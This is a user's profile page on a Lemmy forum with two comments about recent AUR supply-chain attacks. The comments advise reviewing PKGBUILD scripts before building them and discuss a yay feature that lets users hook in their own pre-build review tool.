• 0 posts
  • 5 comments
Joined 3 years ago
Cake day: June 6th, 2023
  • teawrecks@sopuli.xyztoLinux@programming.devAURpocalypse now: a look at the recent AUR attacks
    4 days

    The AUR should not be thought of as a package manager repo. It should be thought of as a pastebin for pkgbuild scripts, i.e. build instructions. Running them without looking is the equivalent of blindly copying shell commands from stackoverflow.

    If you are thinking “I want to install this package I found, it doesn’t exist in any repo, but their build instructions are complex and don’t have instructions for arch,” a pkgbuild is a great resource. At the very least you can read someone’s pkgbuild to see what dependencies and build steps worked for them (in the same way that you can disect a shell script line-by-line to understand what it’s doing).

    The only official way to use the AUR is to manually download a pkgbuild file and use manually run makepkg to execute it. All the other tools that turn it into a convenient repo source (ex. yay, paru, pamac) are unofficial.

  • teawrecks@sopuli.xyztoLinux@programming.devAURpocalypse now: a look at the recent AUR attacks
    4 days

    Does anyone know if yay gives me the ability to hook my own tool in to review pkgbuilds before accepting them? They argue that they don’t want to just give attackers access to a scanning tool, because all they’d do is just iterate on their pkgbuild until it reports “not detected”. But if yay gives me an easy way to hook in whatever tool I want, the attacker can’t be sure what tool to defeat. If thousands of people all run various tools, surely a few of them will spot the anomaly quickly.

    Edit: it looks like they’ve added this exact functionality in response to the attacks: https://jguer.space/blog/2026-06-15-yay-v13